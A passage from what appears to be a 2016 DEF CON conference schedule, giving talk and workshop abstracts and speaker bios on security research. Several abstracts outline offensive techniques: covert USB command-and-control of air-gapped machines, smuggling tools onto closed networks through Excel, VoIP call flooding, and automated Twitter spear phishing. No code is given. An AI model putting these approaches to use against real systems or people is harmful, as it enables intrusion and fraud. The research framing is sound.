Jeff Kitson is a Security Researcher with the Vulnerability Assessment Team of Trustwave SpiderLabs. His career began with full-stack web development before moving into system administration and eventually vulnerability and security research. His current work includes maintaining and developing vulnerability tools within Trustwave. His research interests include IOT devices and extracting information with software defined radio.
Return to Index
BHV - Skyview 4 - Friday - 15:30-15:59
Speakers: Ryan Schmoll and Peter Hefley
About Ryan and Peter:
Ryan and Peter can each say that they were the world's third largest nuclear power at some point in their life. They enjoy short walks along beaches lined with broken glass and broken dreams. They share experience keeping the world safe through "deterrence" and watching DirecTV for extended periods of time, well below ground, in America's heartland. Subsequently, Peter pursued a life in penetration testing while Ryan made poor life decisions and is (still) studying to be a physician. With their blended experience in security, medicine, and an altruism that can only be gained by holding millions of lives at risk in support of vague and ever-changing national security objectives, this duo is seeking to create a collaborative medical experience for patients and physicians that shatters the current paradigm.
Abstract:
Teleradiology is an $8 billion a year industry and we are going to disrupt it. Medical records are critical infrastructure, and with an increasing emphasis on real-time interpretations of medical imagery to improve healthcare outcomes in emergency situations, it is imperative that the systems enabling medical collaboration are secure and reliable. Here we present an Ethereum-based application that allows anyone who needs help interpreting an image to reach out to a radiologist anywhere in the world, securely, privately, without a third-party intermediary, and for a lower price than existing teleradiology firms.
Return to Index
DEFCON - Track Two - Saturday - 14:00-14:59
Universal Serial aBUSe: Remote Physical Access Attacks
Rogan Dawes Researcher, Sensepost
Dominic White CTO, SensePost
In this talk, we'll cover some novel USB-level attacks that can provide remote command and control of even air-gapped machines with a minimal forensic footprint, and release an open-source toolset using freely available hardware.
In 2000, Microsoft published its 10 Immutable Laws of Security [1], one of which was "if a bad guy has unrestricted access to your computer, it's not your computer anymore." This has been robustly demonstrated over the years. Examples include numerous DMA-access attacks against interfaces such as FireWire [2], PCMCIA and Thunderbolt [3], as well as USB-based attacks including simple in-line keyloggers, "evil maid" attacks [4] and malicious firmware [5].
Despite these warnings, groups such as the NSA were still able to use physical access to bypass software controls with toolsets such as COTTONMOUTH [6]. Likewise, criminals have been able to defraud banks with a handful of simple hardware tricks [7]. While some progress has been made to secure some devices against some threats, such as the use of full disc encryption, or the impact of Apple's secure enclave in the physical security of the iPhone [8], most laptops and desktops remain vulnerable to attacks via physical interfaces.
In our experience, organisations merely view USB devices as a channel for malware or unsanctioned communications, and rely on protections placed elsewhere in their defensive stack to deal with them, but few deal with the risk the USB interface presents directly. There are many scenarios where gaining physical access to hosts is plausible [9], and having done so can provide access to "chewy" internal networks [10] ripe for lateral movement.
While most people are familiar with USB devices, many don't realise the extent to which the USB standard allows seemingly innocuous devices to have multiple personalities. There has been an extensive amount of research into malicious USB devices, such as TURNIPSCHOOL [15], GoodFET/Facedancer [16], Shikra [17], Rubber Ducky [11], USBdriveby [12] and BadUSB [5]. However, none of these implement an end-to-end attack, either because that was not their intention, because they only focus on a part of the attack, or because the project was never completed.
Additionally, existing attacks are predominantly "send only" with no built-in bidirectional communications. They usually rely on the executed payload and the host's networks for any advanced remote access. Thus, these payloads can leave a significant forensic footprint in the form of network communications and on-host behaviours, leaving them vulnerable to anti-malware controls. Numerous companies are improving toolsets to detect such attacks [13][14]. Lastly, these attacks are often "spray and pray", unable to account for variations in the user's behaviour or computer setup.
Our approach is to create a stealthy bi-directional channel between the host and device, with remote connectivity via 3G/Wi-Fi/Bluetooth, and to offload the complexity to our hardware, leaving a small, simple stub to run on the host. This talk will discuss the process of creating a set of malicious USB devices using low-cost hardware. The design and toolkit will be released during the talk.
Our toolkit provides three significant improvements over existing work. The first is the ability to gain a stealthy bi-directional channel with the host via the device. No traffic is generated on the target network (i.e. it would work against air-gapped hosts). This is done via the use of either a raw HID device or a standard USB class printer driver linked to our device, with the stub merely wrapping commands and their output to our device. The second is the ability to communicate with the device remotely via Wi-Fi/3G/Bluetooth, allowing for updates to the payloads, exfiltration of data, real-time interaction with the host and an ability to debug problems. This also has the advantage that any network controls are bypassed. Finally, the stub running on the host will leave a minimal forensic trail, making detection of the attack, or analysis of it later, difficult. For completeness' sake, a new transport for Metasploit was developed to allow Metasploit payloads to be used instead.
Our hope is that the tools will provide a method of demonstrating the risk of physical bypasses of software security without an NSA budget, and encourage defences to be built in this area.
[1] "10 Immutable Laws of Security" https://technet.microsoft.com/library/cc722487.aspx
[2] "Physical memory attacks via Firewire/DMA - Part 1: Overview and Mitigation" https://web.archive.org/web/20160304055745/http://www.hermann-uwe.de/blog/physical-memory-attacks-via-firewire-dma-part-1-overview-and-mitigation
[3] "Thunderstrike 2" https://trmm.net/Thunderstrike_2
[4] "Evil Maid goes after TrueCrypt!" http://theinvisiblethings.blogspot.co.za/2009/10/evil-maid-goes-after-truecrypt.html
[5] "Turning USB peripherals into BadUSB" https://srlabs.de/badusb/
[6] "Your USB cable, the spy: Inside the NSA’s catalog of surveillance magic" http://arstechnica.com/information-technology/2013/12/inside-the-nsas-leaked-catalog-of-surveillance-magic/
[7] "How bank hackers stole £1.25 million with a simple piece of computer hardware" https://www.grahamcluley.com/2014/04/bank-hackers-hardware/
[8] "Apple vs FBI" https://www.apple.com/customer-letter/
[9] "Users Really Do Plug in USB Drives They Find" https://zakird.com/papers/usb.pdf
[10] "The Design of a Secure Internet Gateway" http://www.cheswick.com/ches/papers/gateway.pdf
[11] "USB Rubber Ducky Wiki" http://usbrubberducky.com/
[12] "USBDriveBy" http://samy.pl/usbdriveby/
[13] "Cylance, Math vs Malware" https://cdn2.hubspot.net/hubfs/270968/All_Web_Assets/White_Papers/MathvsMalware.pdf
[14] "Carbon Black, Next Generation Endpoint Security" https://www.carbonblack.com/wp-content/uploads/2016/03/2016_cb_wp_next_gen_endpoint_security_small.pdf
[15] "NSA Playset, TURNIPSCHOOL" http://www.nsaplayset.org/turnipschool
[16] "Facedancer2" http://goodfet.sourceforge.net/hardware/facedancer21/
[17] "The Shikra" http://int3.cc/products/the-shikra
Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague's frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies, WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking, and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.
Dominic White is the CTO of SensePost, an information security company based in South Africa and London. He has worked in the industry for 12 years. He tweets as @singe.
Return to Index
SE - Palace 2-5 - Friday - 19:00-19:55
Return to Index
Workshops - Las Vegas Ballroom 5 - Thursday - 15:00-19:00
Use Microsoft Free Security Tools as a Ninja
Simon Roses CEO, Vulnex
Microsoft has published a great many free security tools for developers and IT Pros that are largely unknown. This hands-on lab will introduce you to some of these tools and how they can be used to improve your end game: better security for your products and enterprise.
For developers there are all kinds of security tools that can be used across the entire SDLC to create secure software, and for IT Pros there are a number of tools to analyze and secure desktops and servers more easily and quickly.
This hands-on workshop contains a lot of demos covering topics such as:
- Threat Modeling
- Static analysis of C/C++ and .NET code
- Binary analysis
- Fuzzing applications
- System Attack Surface analysis
- Insecure configurations and vulnerabilities scanning
- Malware Scanning
- Desktop and Server hardening
Some of the tools are Windows focused, but others are technology agnostic so they can be used for other technologies as well.
Whether you are a developer, a sysadmin or an infosec person, there is something for you! By the end of the workshop, you will have learned some free and useful tools you can use right away.
It is time to step up your security game!
Simon Roses holds a B.S. from Suffolk University (Boston), Postgraduate in E-Commerce from Harvard University (Boston) and Executive MBA from IE Business School (IE, Madrid).
He is currently the CEO at VULNEX, driving security innovation, and formerly worked at Microsoft, PriceWaterhouseCoopers and @Stake.
Simon has authored and cooperated in several security Open Source projects like OWASP Pantera and LibExploit. He has also published security advisories in commercial products.
He was awarded a DARPA Cyber Fast Track (CFT) grant to research on software security.
He is a frequent speaker at security industry events including BLACK HAT, RSA, HITB, OWASP, AppSec, SOURCE, DeepSec and Microsoft Security TechNets. CISSP, CEH & CSSLP.
Blog: www.simonroses.com
Max Class Size: 55
Prerequisites for students: Basic Windows skills
Materials or Equipment students will need to bring to participate: Students must bring a laptop with a Windows 7 virtual image (recommended) or later (Windows 10). Note: Administrator permission is required to install some of the tools.
Return to Index
DEFCON - Track Three - Sunday - 11:00-11:59
Use Their Machines Against Them: Loading Code with a Copier
Mike Principal Cyber Security Engineer, The MITRE Corporation
We've all worked on 'closed systems' with little to no direct Internet access. And we've all struggled with the limitations those systems put on us in the form of available tools or software we want to use. I didn't like struggling, so I came up with a method to load whatever I wanted onto a closed system without triggering any common security alerts. To do this I had to avoid accessing the Internet or using mag media. In the end all I needed was an office multi-function machine and Excel. It's all any insider needs.
For my presentation and demo, I'll show you how I delivered a select group of PowerSploit tools to a clean, isolated machine. Of course, Excel has been known as a vector for macro viruses for quite some time, and some of the techniques--such as hex-encoding binary data and re-encoding it on a target machine--are known binary insertion vectors, but I have not found any prior work on an insider using these techniques to deliver payloads to closed systems. You'll leave my presentation knowing why Excel, umm, excels as an insider attack tool, how to leverage Excel features to load and extract arbitrary binary data from a closed network, and what to do if this really frightens you.
Mike has over 20 years' experience in the military. He has been part of everything from systems acquisition, to tactical intelligence collection, to staff work, to leading a unit dedicated to data loss prevention. He recently retired from active military service and is now working as a systems security engineer. This is Mike's first security conference presentation and will also be the first public release of a tool he has written. Mike has previously published twice in 2600 magazine. Mike is super proud of his OSCP certification. He's also a CISSP.
Twitter: @miketofet
Return to Index
WOS - Skyview 6 - Friday - 17:10-17:59
Verifying IPS Coverage Claims: Here's How
Garett Montgomery, Security Team Lead: Application and Threat Intelligence Research Center (ATIRC) at Ixia
IPS devices are now an accepted, integral part of a defense-in-depth InfoSec strategy; by strategically positioning them on the network, attacks can be blocked before they ever reach their intended targets. But with the explosion of public exploits, polymorphic malware and an ever-increasing attack surface, how can IPS devices keep up? They all seem to have heuristic detection capabilities, which are supposed to protect you from unknown exploits, and frequent updates to protect against known vulnerabilities. But just how effective are those defenses? Sure, you can check out the Gartner magic quadrant or pay for the latest NSS Test report. Just because an IPS claims to protect you from a vulnerability doesn't mean that's the case. In this talk, I'll talk about some of the strengths and weaknesses of IPS devices, as well as entire classes of exploits that cause serious problems for IPS devices. While I happen to work for a company that sells a very expensive device for testing IPS devices (which is where the data and my opinions come from), I plan to focus on how the same testing methodologies can be applied and the results can be duplicated using open-source tools.
Garett Montgomery (Twitter: @garett_monty) is Security Team Lead at Ixia's ATI Research Center, where the primary focus is on simulating attacker behaviors in order to provide realistic test scenarios for network-based protection devices. He has been simulating network-based attacks for BreakingPoint/Ixia for the last 4 years. Prior to joining BreakingPoint in 2012 he spent 2 years as a Research Engineer at TippingPoint/HP Enterprise Security. Before TippingPoint, he spent 9 years in the Navy, with the last 3+ as a Security Analyst for the Naval Postgraduate School in Monterey, CA. He holds a Master's Degree in Information Assurance, as well as an active CISSP certification (multiple others having long since lapsed).
Return to Index
BHV - Skyview 4 - Friday - 17:00-17:59
Speaker: Melanie Stegman, Ph.D.
@MelanieAnnS
About Melanie Stegman:
I left my post doc in biochemistry and microbiology to manage the Immune Attack project at the Federation of American Scientists. The game Immune Attack introduces receptors, clouds of cytokines, cytokinesis, and receptor mediated phagocytosis. The game pulls players into the world of cell to cell signaling and molecular immunology. The game was intended to teach basic cellular immunology to college students. However, I felt that Immune Attack could teach molecular cell biology and teach it to younger students.
I created a multiple choice test of molecular and cellular immunology based on the game. I also showed players complex molecular biology images from Nature Immunology Reviews and asked them, “Do you think you could understand this?” Immune Attack students clearly learned molecular immunology and clearly gained confidence in their ability to understand related diagrams (Stegman, 2014). Based on this research, I designed a sequel game, Immune Defense.
I am the chair of the DC chapter of the International Game Developer Association (IGDA). I attend regional and national game developer conferences and my game Immune Defense has been accepted in many competitive commercial game expos. I play a lot of video games. A wide range of audiences are interested in my work: I spoke at national meetings for the Association of Medical Illustrators, the National Science Teachers Association, the Serious Play Conference, Games Society and Learning, and the American Society for Cell Biology.
My intense time as a "post doc" in serious game design and development has taught me many important skills: 1. How to tease out the core elements of concepts and create an engaging game mechanism. 2. How to present ideas to and collaborate with programmers, artists and other game development professionals. 3. How to playtest and iterate the game so that it is fun and intuitive for players. I have an in-depth understanding of the principles of biochemistry and cell biology, the creative vision to produce interactive technology that presents these principles, and experience testing iterative game designs for effectiveness.
Abstract:
I am sure that many of you have wished you had a primer for cellular and molecular biology. You could hand this primer to your friends and say, just check this out! Then your friends could understand better what your biohacking is all about. I made a video game that serves as this primer (Immune Defense). Then I made a site for all kinds of science games: ScienceGameCenter.org
Stories and games can make complex concepts common knowledge. If you doubt that games can teach such complex things, go read the Wikipedia page for The Legend of Zelda: Ocarina of Time. After trying to stagger through all that data, ask 3 random people how to outsmart a Deku shrub and one of them will know right away. You know how to kill a zombie, you understand the difference between a shotgun and a rifle in a game... You could learn the difference between a positron and a helium atom, how to do Punnett squares. You can even play games that create data, like Fold It, Eye Wire, Phylo... There is even a game called Hero.Coli that uses BioBricks to give a heroic E. coli new traits.
I will discuss what makes a game a well-designed game, why that also pertains to science games, and how a few games in particular do an excellent job at teaching abstract, complex fundamental concepts.
Return to Index
Demolabs - Table 5 - Saturday - 14:00-15:50
VirusTotalego
Christian Heinrich
Karl Hiramoto
VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
Maltego performs link analysis of actionable Open Source INTelligence (OSINT).
A set of Maltego Remote/TDS Transforms have been created which integrate with VirusTotal's Public and Private APIs.
Christian Heinrich has presented at the OWASP Conferences in Australia, Europe and USA, ToorCon (USA), Shmoocon (USA), BlackHat (USA and Asia), SecTor (Canada), CONFidence (Europe), Hack In The Box (Europe), SyScan (Singapore), RUXCON (Australia), and AusCERT (Australia). Christian Heinrich has published Maltego Transforms for @haveibeenpwned and Taia Global, Inc that are available for free on the Transform Hub.
Karl Hiramoto has been working at VirusTotal for about two years. In that time he's worked on open source code available on GitHub (https://github.com/VirusTotal), working with partners, development of in-house tools, and Mac OS X sandbox work (http://blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html). Prior to joining VirusTotal, Karl worked on big data mining and embedded Linux systems. www.linkedin.com/in/karlhiramoto
Return to Index
Demolabs - Table 4 - Saturday - 16:00-17:50
Visual Network and File Forensics using Rudra
Ankur Tyagi
Rudra aims to provide a developer-friendly framework for exhaustive analysis of pcap files (later versions will support more file types). It provides features to scan pcaps and generate reports that include the pcap's structural properties, entropy visualization, compression ratio, theoretical minimum size, etc. These help identify the type of data embedded in network flows and, when combined with flow stats like protocol, Yara and shellcode matches, eventually help an analyst quickly decide whether a test file deserves further investigation.
Ankur Tyagi is a research engineer at Qualys Inc., where he analyzes malicious code and applies statistical modelling to identify suspicious patterns and evolving trends. His research interests include developing algorithms and analysis tools that apply stochastic and machine learning models for classifying large collections of uncategorized samples. He has completed an MS in Software Systems with a focus on Applied Security from BITS-Pilani. Contact him at 7h3rAm@gmail.com.
Return to Index
DEFCON - Track Three - Sunday - 14:00-14:59
VLAN hopping, ARP Poisoning and Man-In-The-Middle Attacks in Virtualized Environments
Ronny Bull Assistant Professor of Computer Science, Utica College & Ph.D. Candidate, Clarkson University
Dr. Jeanna N. Matthews Associate Professor of Computer Science, Clarkson University
Ms. Kaitlin A. Trumbull Undergraduate CS Research Assistant, Utica College
Cloud service providers offer their customers the ability to deploy virtual machines in a multi-tenant environment. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. At DEF CON 23, we presented how attacks known to be successful on physical switches apply to their virtualized counterparts. Here, we present new results demonstrating successful attacks on more complicated virtual switch configurations such as VLANs. In particular, we demonstrate VLAN hopping, ARP poisoning and Man-in-the-Middle attacks across every major hypervisor platform. We have added more hypervisor environments and virtual switch configurations since our last disclosure, and have included results of attacks originating from the physical network as well as attacks originating in the virtual network.
Mr. Bull is an Assistant Professor of Computer Science at Utica College with a focus in computer networking and cybersecurity. He is also a Computer Science Ph.D. candidate at Clarkson University focusing on Layer 2 network security in virtualized environments. Ronny earned an A.A.S. degree in Computer Networking at Herkimer College in 2006 and completed both a B.S. and M.S. in Computer Science at SUNYIT in 2011. He also co-founded and is one of the primary organizers of the Central New York Intercollegiate Hackathon event, which brings together cybersecurity students from regional colleges to compete against each other in offensive and defensive cybersecurity activities.
Dr. Matthews is an Associate Professor of Computer Science at Clarkson University. Her research interests include virtualization, cloud computing, computer security, computer networks and operating systems. Jeanna received her Ph.D. in Computer Science from the University of California at Berkeley in 1999. She is currently the co-editor of ACM Operating System Review and a member of the Executive Committee of US-ACM, the U.S. Public Policy Committee of ACM. She is a former chair of the ACM Special Interest Group on Operating Systems (SIGOPS). She has written several popular books including Running Xen: A Hands-On Guide to the Art of Virtualization and Computer Networking: Internet Protocols In Action.
Miss Trumbull is an undergraduate student at Utica College working on her bachelor's degree in Computer Science with a concentration in computer and network security. She is also an officer of the Utica College Computer Science club (a.k.a. The UC Compilers). Kaitlin is currently working as an undergraduate research assistant to Professor Bull.
Return to Index
Workshops - Las Vegas Ballroom 3 - Friday - 10:00-14:00
VoIP Wars: The Live Workshop
Fatih Ozavci Managing Consultant, Context Information Security
VoIP attacks have evolved, and are targeting Unified Communications (UC), commercial services, hosted environments and call centers, using major vendor-specific and protocol vulnerabilities. This workshop is designed to let participants experience these cutting-edge VoIP attacks, and to improve the VoIP skills of incident response teams, penetration testers and network engineers. Modern attack vectors and broad threats against the VoIP ecosystem will be discussed and analyzed for major vendor and protocol vulnerabilities with references to their targets.
In this hands-on workshop, the participants will learn about Unified Communications security fundamentals and testing with practical attacks to improve their skills. Attack scenarios will be discussed for various types of UC implementations to cover business services such as call centers, service operator networks and cloud services. In addition, participants will be provided with the workshop and exercise notes as well as a USB stick that includes virtual machines and software to be used during the workshop. The workshop exercises will be conducted using open source tools and the Viproy VoIP penetration testing kit developed by the trainer.
Fatih Ozavci is a Managing Consultant with Context Information Security and the author of the Viproy VoIP Pen-Test Kit, Viproxy MITM analyser and the VoIP Wars research series. He has fifteen years of extensive experience in the field of information security as a leading security consultant, researcher and instructor.
His current research is focused on securing IMS and UC services, IPTV systems, mobile applications, mobility security testing, hardware hacking and BYOD/MDM analysis. He has discovered previously unknown (zero-day) security vulnerabilities and design flaws in IMS, Unified Communications, Embedded Devices, MDM, Mobility and SAP integrated environments and has published several security advisories for SAP Netweaver, Clicksoft Mobile, Cisco CUCM/CUCDM and Microsoft Skype for Business platforms.
Fatih has previously presented at major security conferences such as Blackhat Europe’15, HITB Singapore 2015, BlackHat USA’14, DEF CON 22 and 21, Troopers’15, Cluecon 2013 and Ruxcon 2013. He has provided VoIP and Mobility Security training at DEF CON 23, AustCert 2014 and 2016, Kiwicon 2015 and Troopers’15.
Homepage (personal) : http://viproy.com/fozavci
Homepage (corporate) : http://www.contextis.com.au
Linkedin : https://au.linkedin.com/in/fozavci
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: For the live exercises, the participants should have a laptop which can run 2 VMware Virtual Machines at the same time. The exercise VMs may require at least 2GB of memory. (The VM images will be provided by the tutor.)
Return to Index
DEFCON - DEF CON 101 - Sunday - 11:00-11:59
Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game
Joshua Drake VP of Platform Research and Exploitation, Zimperium
Steve Christey Coley Principal INFOSEC Engineer, MITRE
If you’re interested in vulnerability research for fun or profit, or if you’re a beginner and you’re not sure how to progress, it can be difficult to sift through the firehose of technical information that’s out there. Plus there are all sorts of non-technical things that established researchers seem to just know. There are many different things to learn, but nobody really talks about the different paths you can take on your journey. We will provide an overview of key concepts in vulnerability research, then cover where you can go to learn more - and what to look for. We’ll suggest ways for you to choose what you analyze and provide tools and techniques you might want to use. We’ll discuss different disclosure models (only briefly, we promise!), talk about the different kinds of responses to expect from vendors, and give some advice on how to write useful advisories and how to go about publishing them. Then, we’ll finish up by covering some of the ‘mindset’ of vulnerability research, including skills and personality traits that contribute to success, the different stages of growth that many researchers follow, and the different feelings (yes, FEELINGS) that researchers can face along the way. Our end goal is to help you improve your chances of career success, so you can get a sense of where you are, where you want to go, and what you might want to do to get there. We will not dig too deeply into technical details, and we’d go so far as to say that some kinds of vulnerability research do not require deep knowledge anyway. Vulnerability research isn’t for everyone, but after this talk, maybe you’ll have a better sense of whether it’s right for you, and what to expect going forward.
Joshua J. Drake is the VP of Platform Research and Exploitation at Zimperium Enterprise Mobile Security and lead author of the Android Hacker's Handbook. Joshua focuses on original research such as reverse engineering and the analysis, discovery, and exploitation of security vulnerabilities. He has over 10 years of experience researching and exploiting a wide range of application and operating system software with a focus on Android since early 2012. In prior roles, he served at Accuvant Labs, Rapid7's Metasploit, and VeriSign's iDefense Labs. Joshua previously spoke at Black Hat, DEF CON, RSA, CanSecWest, REcon, Ruxcon/Breakpoint, Toorcon, and DerbyCon. Other notable accomplishments include: helping spur mobile ecosystem change in 2015, exploiting Oracle's JVM at Pwn2Own 2013, exploiting the Android browser via NFC with Georg Wicherski at Black Hat USA 2012, and winning DEF CON 18 CTF with ACME Pharm in 2010.
Twitter: @jduck
Steve Christey Coley is a Principal Information Security Engineer in the Cyber Security Division at The MITRE Corporation, supporting FDA CDRH on medical device cyber security. Steve was co-creator and Editor of the CVE list and chair of the CVE Editorial Board from 1999 to 2015. He is the technical lead for CWE, the Common Weakness Scoring System (CWSS), and the CWE/SANS Top 25 Most Dangerous Software Errors. He was a co-author of the influential ‘Responsible Vulnerability Disclosure Process’ IETF draft with Chris Wysopal in 2002. He was an active contributor to other community-oriented efforts such as CVSS, CVRF, and NIST's Static Analysis Tool Exposition (SATE). His interests include adapting traditional IT security methodologies to new areas, software assurance, improving vulnerability information exchange, and making the cybersecurity profession more inclusive for anybody who seeks a place in it. He holds a B.S. in Computer Science from Hobart College.
Twitter: @sushidude
Return to Index
Workshops - Las Vegas Ballroom 2 - Saturday - 14:00-18:00
Vulnerability Assessment & Exploitation of Crypto-Systems: A Bottom-up Approach
Ajit Hatti Security Researcher
This is a unique workshop on "Vulnerability Assessment & Exploitation of Crypto-Systems". In this course, instead of taking the regular flaws in crypto-implementations or popular attacks from the past, we will take a holistic approach: build a strong understanding of the crypto-subsystems, their inherent security issues, and how to discover, exploit and remediate them, all in a flat 4 hours.
This workshop takes the participants to the next level of practical crypto-assessment and exploitation. With a deeper understanding of crypto-systems, plenty of hands-on vulnerability assessments and exploitation using OpenSSL, open source tools and my custom scripts, participants will learn the important concepts which they can apply in real-world Red Team pentesting or Blue Team defending, assessments & audits of crypto implementations.
The workshop starts with a dive into the crypto systems present on the participant’s own (virtual) machine. Taking a bottom-up approach, we start from Hardware Modules, Firmware, Crypto-Libraries and Network services & go all the way up to applications and trust/key stores, understanding the role of each layer in cryptography, testing for quality + vulnerabilities, and exploiting them.
Some of the unique modules covered in the workshop are testing the quality of numbers generated from RNGs & PRNGs from various sources; extracting prime numbers from private keys, DH parameters and secret keys and testing for backdoors (number fixation), quality of randomness, and safety parameters (like the Sophie Germain test). As we go upwards we will search for and steal insecure keys for network hopping like APTs/malware, pin rogue certificates, bypass HSTS checks to steal cookies, exploit certificate switching, look for seeds used in PRNG functions, re-usage of keys and flaws in SCEP implementations. We top it up with the popular named attacks from HEARTBLEED to LOGJAM and other popular CVEs.
I will be sharing numerous scripts written by me and open source tools which participants can use to test or automate the assessment of their own crypto-systems.
The workshop is best suited for pen-testers, developers, security engineers, auditors and compliance consultants in general, but a must for those who deal with products or services involving cryptography and PKI implementations. The contents + flow of the workshop are well structured to accommodate participants from beginner to advanced levels of competence.
Ajit is a founder of "SECURITY MONX" & author of the LAMMA project, an Open Source initiative to improve the security of crypto implementations & better consume Cyber Threat Intelligence, which is also his primary area of research.
Currently Ajit is Principal Consultant (Cryptography & System Security) with Payatu Technologies. He has worked as a Security Researcher with Symantec, Emerson, IBM and Bluelane Technologies in the past & has presented his research at BlackHat, Defcon-CnPV & Nullcon.
Ajit is also a co-founder of the "null Open Security Community", a hardcore volunteer and contributor through the community efforts of Null, Nullcon, SecurityTube.net & BSidesLV. Ajit is also a marathon runner and organizes "World Run By Hackers" during these conferences.
Max Class Size: 55
Prerequisites for students:
- Basic understanding of Cryptographic schemes.
- High level Knowledge of application, system security.
- Basic understanding of Encryption, Hashing schemes, Digital Certificates.
Materials or Equipment students will need to bring to participate: Laptop with OpenSSL installed
Return to Index
DEFCON - DEF CON 101 - Thursday - 13:00-13:59
Weaponize Your Feature Codes
Nicholas Rosario (MasterChen), VoIP Administrator
Almost everyone is familiar with feature codes, also known as star codes, such as *67 to block caller ID or *69 to find out who called you last. What if the feature codes could be used as a weapon? Caller ID spoofing, tDOSing (Call flooding), and SMS flooding are known attacks on phone networks, but what happens when they become as easy to launch as dialing *40?
Weaponize Your Feature Codes will first take the audience through a brief history of feature codes and common usage, and then demonstrate the more nefarious applications. The presentation will share the Asterisk code used to implement these "rogue" features, and mention possible ways of mitigation. While this talk builds upon previous work from the author, referenced in past DEF CON presentations, the new code written makes carrying out such attacks ridiculously easy.
Nicholas Rosario, MasterChen, is currently a VoIP Administrator. He has been published in 2600: The Hacker Quarterly twice for his research on the Asterisk PBX system and has given presentations at BSides Las Vegas and the DEF CON 303 Skytalks. His most recent research blends technology with psychological principles. MasterChen is an active member of the SYNShop hacker space in Las Vegas, NV and a co-founder and host of the weekly GREYNOISE infosec podcast.
Twitter: @chenb0x
Instagram: @chenb0x
Return to Index
DEFCON - Track One - Saturday - 14:00-14:59
Weaponizing Data Science for Social Engineering: Automated E2E Spear Phishing on Twitter
Delta Zero (John Seymour) Data Scientist, ZeroFOX
KingPhish3r (Philip Tully) Senior Data Scientist, ZeroFOX
Historically, machine learning for information security has prioritized defense: think intrusion detection systems, malware classification and botnet traffic identification. Offense can benefit from data just as well. Social networks, especially Twitter with its access to extensive personal data, bot-friendly API, colloquial syntax and prevalence of shortened links, are the perfect venues for spreading machine-generated malicious content. We present a recurrent neural network that learns to tweet phishing posts targeting specific users. The model is trained using spear phishing pen-testing data, and in order to make a click-through more likely, it is dynamically seeded with topics extracted from timeline posts of both the target and the users they retweet or follow. We augment the model with clustering to identify high value targets based on their level of social engagement such as their number of followers and retweets, and measure success using click-rates of IP-tracked links. Taken together, these techniques enable the world's first automated end-to-end spear phishing campaign generator for Twitter.
John Seymour is a Data Scientist at ZeroFOX, Inc. by day, and a Ph.D. student at the University of Maryland, Baltimore County by night. He researches the intersection of machine learning and InfoSec in both roles. He's mostly interested in avoiding and helping others avoid some of the major pitfalls in machine learning, especially in dataset preparation (seriously, do people still use malware datasets from 1998?). He has spoken at both DEF CON and BSides, and aims to add BlackHat USA and SecTor to the list in the near future.
Twitter: @_delta_zero
Philip Tully is a Senior Data Scientist at ZeroFOX, a social media security company based in Baltimore. He employs natural language processing and computer vision techniques in order to develop predictive models for combating threats emanating from social media. His pivot into the realm of infosec is recent, but his experience in machine learning and artificial neural networks is not. Rather than learning patterns within text and image data, his previous work focused on learning patterns of spikes in large-scale recurrently connected neural circuit models. He is an all-but-defended computer science PhD student, in the final stages of completing a joint degree at the Royal Institute of Technology (KTH) and the University of Edinburgh.
Twitter: @phtully
Return to Index
Demolabs - Table 6 - Saturday - 14:00-15:50
WebSec: a cross-platform, large-scale vulnerability scanner
Dragos Boia
This demo shows the architecture and implementation details of WebSec, a dynamically scalable system whose modular architecture allows it to scale to millions of endpoints, each of which can be receiving hundreds of tests. WebSec addresses the need to scale up to testing multiple sites, including some of those with the top traffic and largest attack surfaces on the Internet (like Bing and MSN), and also to identify vulnerabilities in connected applications that make use of online services for their functionality.
Dragos Boia is currently a Senior Software Engineer at Microsoft. He has almost two decades of experience in designing and building software. His experience ranges from security, machine learning and big data to distributed systems. He is currently focusing more on security and distributed systems. He holds several patents. He has a B.Sc. and an M.Sc. in Math/Computer Science from the University of Bucharest in Romania.
Return to Index
BHV - Skyview 4 - Saturday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Friday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Sunday - 11:00-11:59
Speaker: Staff
Return to Index
SkyTalks - Skyview 3 - Sunday - 09:00-09:59
Speakers: Mike Raggo, Chet Hosmer
Talk: What's Lurking Inside MP3 Files That Can Hurt You?
This session will dive into the details of MP3 files, examining the potential covert and overt contents that they harbor. MP3 files, and more specifically their ID3 header, contain a data structure that holds a massive set of data to satisfy the appetite of the most ardent music enthusiast, but these same contents also pose a nightmare for those tasked with uncovering covert communications and hidden content. In addition, the talk will dive into the digital rights management capabilities of MP3/ID3 to assess whether